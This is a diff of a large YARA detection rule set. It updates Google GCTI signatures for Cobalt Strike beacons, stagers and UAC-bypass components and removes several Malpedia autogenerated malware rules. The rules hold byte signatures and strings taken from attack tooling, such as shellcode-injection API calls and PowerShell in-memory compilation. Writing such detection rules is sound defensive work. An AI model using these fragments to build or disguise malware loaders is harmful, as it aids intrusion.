+		hash = "945e10dcd57ba23763481981c6035e0d0427f1d3ba71e75decd94b93f050538e"
+		logic_hash = "81571a6c30802430d0df9980e005736d58464bde98c0889b48bf8d0c7e88d247"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$wnd_proc = {
-			6A 00
-			6A 28
-			68 00 01 00 00
-			5?
-			C7 [5] 01 00 00 00
-			FF ??
-			6A 00
-			6A 27
-			68 00 01 00 00
-			5?
-			FF ??
-			6A 00
-			6A 00
-			68 01 02 00 00
-			5?
-			FF ??
-		}
+		$version_sig = { 48 8D 0D 01 5B FF FF 48 83 C4 28 E9 A8 54 FF FF 8B D0
+                     49 8B CA E8 22 55 FF FF }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$wnd_proc
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuactoken_X64_Dll_V3_11_To_V3_14
+rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_14
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuactoken.x64.dll from v3.11 to v3.14 (64-bit version)"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.14"
 		author = "gssincla@google.com"
-		id = "c89befcd-a622-5947-9ce3-a6031901a45a"
+		id = "d69171e3-86f4-5187-8874-5eee2045f746"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_x64_Dll_v3_11_to_v3_14.yara#L17-L118"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1442-L1477"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "853068822bbc6b1305b2a9780cf1034f5d9d7127001351a6917f9dbb42f30d67"
-		logic_hash = "adfd212f2e470f666ab8a2168e976c11d3032c31dab7cf56963dae5fc0f6c5f9"
+		hash = "297a8658aaa4a76599a7b79cb0da5b8aa573dd26c9e2c8f071e591200cf30c93"
+		logic_hash = "87cf465154d4294eeda9cf99c6c160da80cfa8a65244bc083737c0c87163431d"
 		score = 75
 		quality = 85
 		tags = ""
+		rs2 = "39b9040e3dcd1421a36e02df78fe031cbdd2fb1a9083260b8aedea7c2bc406bf"
 
 	strings:
-		$isHighIntegrityProcess = {
-			83 ?? 7A
-			75 ??
-			8B [3]
-			33 ??
-			FF 15 [4]
-			44 [4]
-			8D [2]
-			48 8B ??
-			48 8D [3]
-			48 8B ??
-			4C 8B ??
-			48 89 [3]
-			FF 15 [4]
-			85 C0
-			74 ??
-			48 8B ??
-			FF 15 [4]
-			8D [2]
-			8A ??
-			40 [2]
-			0F B6 D1
-			48 8B 0F
-			FF 15 [4]
-			81 ?? 00 30 00 00
-		}
-		$executeTaskmgr = {
-			44 8D ?? 70
-			48 8D [3]
-			E8 [4]
-			83 [3] 00
-			48 8D [5]
-			0F 57 ??
-			66 0F 7F [3]
-			48 89 [3]
-			48 8D [5]
-			48 8D [3]
-			C7 [3] 70 00 00 00
-			C7 [3] 40 00 00 00
-			48 89 [3]
-			FF 15
-		}
+		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 B1 1F 00 00 8B D0 49 8B CA
+                     48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Bypassuac_X64_Dll_V3_3_To_V3_14_And_Sleeve_Bypassuac_X64_Dll_V4_0_And_V4_X
+rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_X86_V4_0_Suspected
 {
 	meta:
-		description = "Cobalt Strike's resources/bypassuac-x64.dll from v3.3 to v3.14 (64-bit version) and sleeve/bypassuac.x64.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.0 (suspected, not confirmed)"
 		author = "gssincla@google.com"
-		id = "eef83901-63d9-55a3-b115-03f420416177"
+		id = "28a735c4-87d1-5e14-9379-46a6fd0cdd2a"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_x64_Dll_v3_3_to_v3_14_and_Sleeve_Bypassuac_x64_Dll_v4_0_and_v4_x.yara#L17-L86"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1480-L1515"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "9ecf56e9099811c461d592c325c65c4f9f27d947cbdf3b8ef8a98a43e583aecb"
-		logic_hash = "d76e3601f61ae164a8df9048d59d15cd6913e64adb93132244e83f40bf67d86a"
+		hash = "55aa2b534fcedc92bb3da54827d0daaa23ece0f02a10eb08f5b5247caaa63a73"
+		logic_hash = "0dbf6a75dc74f4c2a7604072a01e2dbaaee15f5e57c765f24138d85c248fb305"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$deleteFileCOM = {
-			48 8B [5]
-			45 33 ??
-			48 8B ??
-			FF 90 90 00 00 00
-			85 C0
-			75 ??
-			48 8B [5]
-			48 8B ??
-			FF 92 A8 00 00 00
-			85 C0
-		}
-		$copyFileCOM = {
-			48 8B [5]
-			4C 8B [5]
-			48 8B [5]
-			48 8B ??
-			4C 8B ??
-			48 89 [3]
-			FF 90 80 00 00 00
-			85 C0
-			0F 85 [4]
-			48 8B [5]
-			48 8B 11
-			FF 92 A8 00 00 00
-		}
+		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 D1 B3 FF FF
+                     8B D0 49 8B CA 48 83 C4 28 E9 AF F5 FF FF 45 33 C0
+                     4C 8D 0D 8D 70 FF FF 8B D0 49 8B CA E8 9B B0 FF FF }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Artifact32Svc_Exe_V3_1_V3_2_V3_14_And_V4_X
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_1_And_V_4_2
 {
 	meta:
-		description = "Cobalt Strike's resources/artifact32svc(big).exe signature for versions 3.1 and 3.2 (with overlap with v3.14 through v4.x)"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.1 and 4.2"
 		author = "gssincla@google.com"
-		id = "732169be-e334-5774-b0ac-54b217a8b681"
+		id = "dc320d17-98fc-5df3-ba05-4d134129317e"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32svc_Exe_v1_49_to_v4_x.yara#L53-L77"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1517-L1553"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "871390255156ce35221478c7837c52d926dfd581173818620b738b4b029e6fd9"
-		logic_hash = "b55211fc2dbe100edb19c3f3a000be513144e3556c4bce8a29a3c0b77451ba96"
+		hash = "29ec171300e8d2dad2e1ca2b77912caf0d5f9d1b633a81bb6534acb20a1574b2"
+		logic_hash = "9b262ec18f79ab5ae63ad26d3685af088b5feb2d66de6ad3ba584cafbe2ee221"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 }
+		$version_sig = { 83 F9 34 0F 87 8E 03 00 00 0F 84 7A 03 00 00 83 F9 1C 0F 87 E6 01 00 00
+                     0F 84 D7 01 00 00 83 F9 0E 0F 87 E9 00 00 00 0F 84 CE 00 00 00 FF C9
+                     0F 84 B8 00 00 00 83 E9 02 0F 84 9F 00 00 00 FF C9 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$decoderFunc
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Template_Py_V3_3_To_V4_X
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_3
 {
 	meta:
-		description = "Cobalt Strike's resources/template.py signature for versions v3.3 to v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Version 4.3"
 		author = "gssincla@google.com"
-		id = "16aef9a9-b217-5462-93dc-f6273c99ddd0"
+		id = "572616c7-d1ec-5aa1-b142-4f2edf73737f"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Py_v3_3_to_v4_x.yara#L17-L36"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1555-L1590"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "d5cb406bee013f51d876da44378c0a89b7b3b800d018527334ea0c5793ea4006"
-		logic_hash = "3c26cea4b8f2b200bf58e939ae9ead7a7339d4ec0de8c72b3d9c7da897600081"
+		hash = "3ac9c3525caa29981775bddec43d686c0e855271f23731c376ba48761c27fa3d"
+		logic_hash = "0c8934e997583339145749a3167ac010d8c77b2ed878d2c999de68ec2a98101d"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$arch = "platform.architecture()"
-		$nope = "WindowsPE"
-		$alloc = "ctypes.windll.kernel32.VirtualAlloc"
-		$movemem = "ctypes.windll.kernel32.RtlMoveMemory"
-		$thread = "ctypes.windll.kernel32.CreateThread"
-		$wait = "ctypes.windll.kernel32.WaitForSingleObject"
+		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 D3 88 FF FF
+                     4C 8D 05 84 6E FF FF 8B D0 49 8B CA 48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Httpsstager64_Bin_V3_2_Through_V4_X
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_4_V_4_5_And_V4_6
 {
 	meta:
-		description = "Cobalt Strike's resources/httpsstager64.bin signature for versions v3.2 to v4.x"
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.4 through at least 4.6"
 		author = "gssincla@google.com"
-		id = "c16e73fc-484a-5f7e-8127-d85a0254d842"
+		id = "79b6bfd4-1e45-5bd9-ac5c-19eb176ce698"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara#L17-L90"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1593-L1628"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "109b8c55816ddc0defff360c93e8a07019ac812dd1a42209ea7e95ba79b5a573"
-		logic_hash = "4889a23c1f2780044b9fb2a0207676d57e82e6c1275614b684a5a9cbe984b761"
+		hash = "3280fec57b7ca94fd2bdb5a4ea1c7e648f565ac077152c5a81469030ccf6ab44"
+		logic_hash = "be0bbf58a176f8089924b3ce58268d906f49dde51d863524971e46f4bada43a3"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$apiLocator = {
-			48 [2]
-			AC
-			41 [2] 0D
-			41 [2]
-			38 ??
-			75 ??
-			4C [4]
-			45 [2]
-			75 ??
-			5?
-			44 [2] 24
-			49 [2]
-			66 [4]
-			44 [2] 1C
-			49 [2]
-			41 [3]
-			48
-		}
-		$InternetSetOptionA = {
-			BA 1F 00 00 00
-			6A 00
-			68 80 33 00 00
-			49 [2]
-			41 ?? 04 00 00 00
-			41 ?? 75 46 9E 86
-		}
+		$version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 83 88 FF FF
+                     4C 8D 05 A4 6D FF FF 8B D0 49 8B CA 48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
-		$apiLocator and $InternetSetOptionA
+		all of them
 }
-rule GCTI_Cobaltstrike_Resources_Template__X32_X64_Ps1_V1_45_To_V2_5_And_V3_11_To_V3_14
+rule GCTI_Cobaltstrike_Sleeve_Beacon_X64_V4_5_Variant
 {
 	meta:
-		description = "Cobalt Strike's resources/template.x64.ps1, resources/template.x32 from v3.11 to v3.14 and resources/template.ps1 from v1.45 to v2.5 "
+		description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.5 (variant)"
 		author = "gssincla@google.com"
-		id = "c9fa6a39-0098-5dde-9762-94bc6b2df299"
+		id = "45715da9-8f16-5304-b216-1ca36c508c77"
 		date = "2022-11-18"
-		modified = "2022-11-19"
+		modified = "2023-12-04"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template__x32_x64_Ps1_v1_45_to_v2_5_and_v3_11_to_v3_14.yara#L17-L43"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1630-L1665"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87"
-		logic_hash = "5196f111f257239d2e7e4ca342e7fc8bac1687743bc8c7ff23addf1f094b2e93"
+		hash = "8f0da7a45945b630cd0dfb5661036e365dcdccd085bc6cff2abeec6f4c9f1035"
+		logic_hash = "31a108168489a24d1bc297d722741f3fd19abd1bed4c76d54967c73986d18123"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$importVA = "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc" nocase
-		$importCT = "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread" nocase
-		$importWFSO = "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject" nocase
-		$compiler = "New-Object Microsoft.CSharp.CSharpCodeProvider" nocase
-		$params = "New-Object System.CodeDom.Compiler.CompilerParameters" nocase
-		$paramsSys32 = ".ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))" nocase
-		$paramsGIM = ".GenerateInMemory = $True" nocase
-		$result = "$compiler.CompileAssemblyFromSource($params, $assembly)" nocase
+		$version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 E8 AB FF FF
+                     8B D0 49 8B CA E8 1A EB FF FF 48 83 C4 28 }
+		$decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 }
 
 	condition:
 		all of them
 }
-rule GCTI_Cobaltstrike__Resources_Browserpivot_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_Dll_V4_0_To_V4_X
+rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/browserpivot.bin from v1.48 to v3.14 and sleeve/browserpivot.dll from v4.0 to at least v4.4"
+		description = "Cobalt Strike's resources/dnsstager.bin signature for versions 1.47 to 4.x"
 		author = "gssincla@google.com"
-		id = "55086544-6684-526b-914f-505a562be458"
+		id = "e1b0e368-9bcf-5d9b-b2b3-8414742f213e"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_Dll_v4_0_to_v4_x.yara#L17-L60"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Dnsstager_Bin_v1_47_through_v4_x.yara#L17-L78"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "12af9f5a7e9bfc49c82a33d38437e2f3f601639afbcdc9be264d3a8d84fd5539"
-		logic_hash = "416554d31c105fd96aeaef508847efe2889590909c8d0025e3862e5b24078131"
+		hash = "10f946b88486b690305b87c14c244d7bc741015c3fef1c4625fa7f64917897f1"
+		logic_hash = "d4500d8a83a821e1df9e808b17a87c1207d78ea0e03886544a632176fe93ccd0"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = ""
 
 	strings:
-		$socket_recv = {
-			FF [1-5]
-			83 ?? FF
-			74 ??
-			85 C0
-			(74 | 76) ??
-			03 ??
-			83 ?? 02
-			72 ??
-			80 ?? 3E FF 0A
+		$apiLocator = {
+			31 ??
+			AC
+			C1 ?? 0D
+			01 ??
+			38 ??
 			75 ??
-			80 ?? 3E FE 0D
+			03 [2]
+			3B [2]
+			75 ??
+			5?
+			8B ?? 24
+			01 ??
+			66 8B [2]
+			8B ?? 1C
+			01 ??
+			8B ?? 8B
+			01 ??
+			89 [3]
+			5?
+			5?
 		}
-		$fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]"
+		$dnsapi = { 68 64 6E 73 61 }
 
 	condition:
-		all of them
+		$apiLocator and $dnsapi
 }
-rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X
+rule GCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_X
 {
 	meta:
-		description = "Cobalt Strike's resources/reverse.bin signature for versions 2.5 to 4.x"
+		description = "Cobalt Strike's resources/smbstager.bin signature for versions 2.5 to 4.x"
 		author = "gssincla@google.com"
-		id = "182dbcd0-1180-5516-abe3-cf2eebbd0e39"
+		id = "074b7d83-e3d8-541c-804b-2417c21f54d5"
 		date = "2022-11-18"
 		modified = "2022-11-19"
 		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Reverse_Bin_v2_5_through_v4_x.yara#L17-L104"
+		source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Smbstager_Bin_v2_5_through_v4_x.yara#L17-L95"
 		license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE"
-		hash = "887f666d6473058e1641c3ce1dd96e47189a59c3b0b85c8b8fccdd41b84000c7"
-		logic_hash = "c6c4fc477c7654ec07eb6ef4c6d53805a9b4881ba288754e1f50b3e4b134333c"
+		hash = "946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c"
+		logic_hash = "b0f6535069df16a64de44ca0638ec060c1ff264a7820c94710d61ca7e8474450"
 		score = 75
 		quality = 85
 		tags = ""
@@ -79168,20 +79731,17 @@ rule GCTI_Cobaltstrike_Resources_Reverse_Bin_V2_5_Through_V4_X
 			5?
 			5?
 		}
-		$ws2_32 = {
-			5D
-			68 33 32 00 00
-			68 77 73 32 5F
-		}
-		$connect = {
-			6A 10
-			5?
-			5?
-			68 99 A5 74 61
+		$smb = { 68 C6 96 87 52 }
+		$smbstart = {
+			6A 40
+			68 00 10 00 00
+			68 FF FF 07 00
+			6A 00
+			68 58 A4 53 E5
 		}
 
 	condition:
-		$apiLocator and $ws2_32 and $connect
+		$apiLocator and $smb and $smbstart
 }
 rule GCTI_Sliver_Implant_32Bit
 {
@@ -79245,7 +79805,7 @@ rule GCTI_Sliver_Implant_64Bit
  * YARA Rule Set
  * Repository Name: Malpedia
  * Repository: https://github.com/malpedia/signator-rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 6558c417dcf07146b1309b6acde6be0aa96dea10
  * Number of Rules: 1469
  * Skipped: 0 (age), 15 (quality), 0 (score), 0 (importance)
@@ -79255,181 +79815,18 @@ rule GCTI_Sliver_Implant_64Bit
  *
  * NO LICENSE SET
  */
-rule MALPEDIA_Win_Infy_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1542bed5-33fb-5d90-921f-7b98aeb36304"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.infy_auto.yar#L1-L115"
-		license_url = "N/A"
-		logic_hash = "351bd4b7525a7ff94f0f3657e8ee347d6c2c31664e11c42093ff09157f2eb43d"
-		score = 60
-		quality = 45
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 8a0d???????? 0f8748020000 84c9 0fb682c0984000 }
-		$sequence_1 = { 7412 50 e8???????? f685b0fdffff10 0f94c0 eb02 33c0 }
-		$sequence_2 = { ff5324 807b2800 7407 8bc3 e8???????? }
-		$sequence_3 = { ff4af8 e8???????? 8b55ec 8d2494 58 5a }
-		$sequence_4 = { 751b 8d45d0 8945f4 8d55f4 }
-		$sequence_5 = { 833d????????00 740e 8d55d0 52 6a01 }
-		$sequence_6 = { 7226 8b35???????? 0fb74b1a 8d91300b0000 39d7 }
-		$sequence_7 = { 85d2 744c 66837af601 7409 50 }
-		$sequence_8 = { 3b45d8 0f8681feffff 5f 5e 5b }
-		$sequence_9 = { 6a00 66837ef602 7418 89cf 89f0 }
-
-	condition:
-		7 of them and filesize < 147456
-}
-rule MALPEDIA_Win_Cobra_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7889e85-8a86-5887-854a-7a6437d9a16b"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cobra_auto.yar#L1-L476"
-		license_url = "N/A"
-		logic_hash = "652efe51bbd71c6c383988a4a5e7893f0deae6bcb5db842e07957bb56af5eae8"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 7511 e8???????? 85c0 7508 ff15???????? }
-		$sequence_1 = { ff25???????? 53 56 57 8bd9 33f6 }
-		$sequence_2 = { 85c0 750e 3905???????? 7e2c ff0d???????? 83f801 8b0d???????? }
-		$sequence_3 = { c3 85db 7405 83fb03 }
-		$sequence_4 = { 85c0 750e 33ff 8bc7 }
-		$sequence_5 = { 7514 391d???????? 754d 33c0 }
-		$sequence_6 = { 5b c3 83fb01 7405 83fb02 7537 }
-		$sequence_7 = { 890d???????? 753c b980000000 e8???????? 85c0 }
-		$sequence_8 = { 85c0 a3???????? 7504 33c0 eb68 }
-		$sequence_9 = { 83f801 75f1 b900010000 e8???????? }
-		$sequence_10 = { 5f 5e 5b c3 85ff 7418 }
-		$sequence_11 = { 85c0 0f8e8c000000 83e801 8905???????? }
-		$sequence_12 = { e8???????? 8bf8 83fb01 751d 85ff }
-		$sequence_13 = { 33d2 b9e8030000 f7f1 83f805 }
-		$sequence_14 = { 7407 33c0 e9???????? ff15???????? e9???????? }
-		$sequence_15 = { e8???????? 834df8ff 53 57 33db 6800200000 }
-		$sequence_16 = { ff15???????? 8b3d???????? 55 bbffffff7f }
-		$sequence_17 = { 7f07 e8???????? eb26 83c0ff }
-		$sequence_18 = { eb6d e8???????? 85c0 7564 }
-		$sequence_19 = { e8???????? 33db 3bc3 741a }
-		$sequence_20 = { ff5024 488d4d08 e8???????? 488d4d08 e8???????? }
-		$sequence_21 = { 8bc7 eb0e 4883c108 e8???????? }
-		$sequence_22 = { c3 8bc5 ebe4 4533f6 413bee 75f4 }
-		$sequence_23 = { 83385c 7e4b 4c8b505c 4d85d2 7442 448b6c2470 4c8bce }
-		$sequence_24 = { e8???????? b801005921 488b5c2430 488b742438 4883c420 }
-		$sequence_25 = { 83781400 750a b865005921 e9???????? }
-		$sequence_26 = { 83c0fe 668b4802 83c002 663bcb 75f4 8b15???????? 8b0d???????? }
-		$sequence_27 = { c3 8b4d08 57 51 6a00 }
-		$sequence_28 = { 6689440ffc 6685c0 75ee f685c003000010 }
-		$sequence_29 = { 8908 8b0d???????? 895004 894808 33c0 }
-		$sequence_30 = { 8b7d0c 3bc3 7508 3bfb }
-		$sequence_31 = { 83feff 7505 33c0 5e 5d c3 8b4d08 }
-		$sequence_32 = { ff15???????? 83f87a 740b 3d230000c0 }
-		$sequence_33 = { 8bec 56 6a00 6880000000 6a03 6a00 6a03 }
-		$sequence_34 = { 68???????? 51 ffd6 83c40c 6a28 }
-		$sequence_35 = { 6a03 68000000c0 50 ff15???????? 8bf0 83feff 7505 }
-		$sequence_36 = { 8d45e8 50 6a00 6aff e8???????? 85c0 7405 }
-		$sequence_37 = { 4156 4157 488dac24b8f3ffff 4881ec480d0000 4533e4 4c8bf1 488bda }
-		$sequence_38 = { ff15???????? 488bcf ff15???????? 41b701 }
-		$sequence_39 = { 8d8588feffff 68???????? 50 ff15???????? 83c42c }
-		$sequence_40 = { 4584ff 7518 33c0 4881c4480d0000 }
-		$sequence_41 = { 48894c2450 4c89642448 488d4c2468 48894c2440 }
-		$sequence_42 = { 48894706 488b05???????? 4889470e 0fb705???????? }
-		$sequence_43 = { 84c0 0f45f9 488bce 8bd7 ff15???????? }
-		$sequence_44 = { 7507 32c0 e9???????? c745b818000000 }
-		$sequence_45 = { 83c002 6685c9 75f5 2bc2 d1f8 66837c43fe5c }
-		$sequence_46 = { 05a2000000 50 8d8c249c0d0000 68???????? }
-		$sequence_47 = { 0f8431ffffff 8b4d08 5f 8931 }
-		$sequence_48 = { 0f8456feffff 807c241301 6800080000 0f8544020000 }
-		$sequence_49 = { 0f84100f0000 6800080000 57 56 }
-		$sequence_50 = { 05a2000000 50 8d94249c0d0000 68???????? }
-		$sequence_51 = { 05a1000000 50 8d84249c0d0000 68???????? }
-		$sequence_52 = { 668cc8 c3 53 50 }
-		$sequence_53 = { 85c0 740a b8050000c0 e9???????? }
-		$sequence_54 = { c745c000000000 8d45cc 50 8b4dc8 51 ff15???????? }
-		$sequence_55 = { c745c000000000 8d4dcc 51 8b55c8 }
-
-	condition:
-		7 of them and filesize < 1368064
-}
-rule MALPEDIA_Win_Quarterrig_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "768adc6e-04ee-5553-a73f-cf738ca33079"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quarterrig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quarterrig_auto.yar#L1-L131"
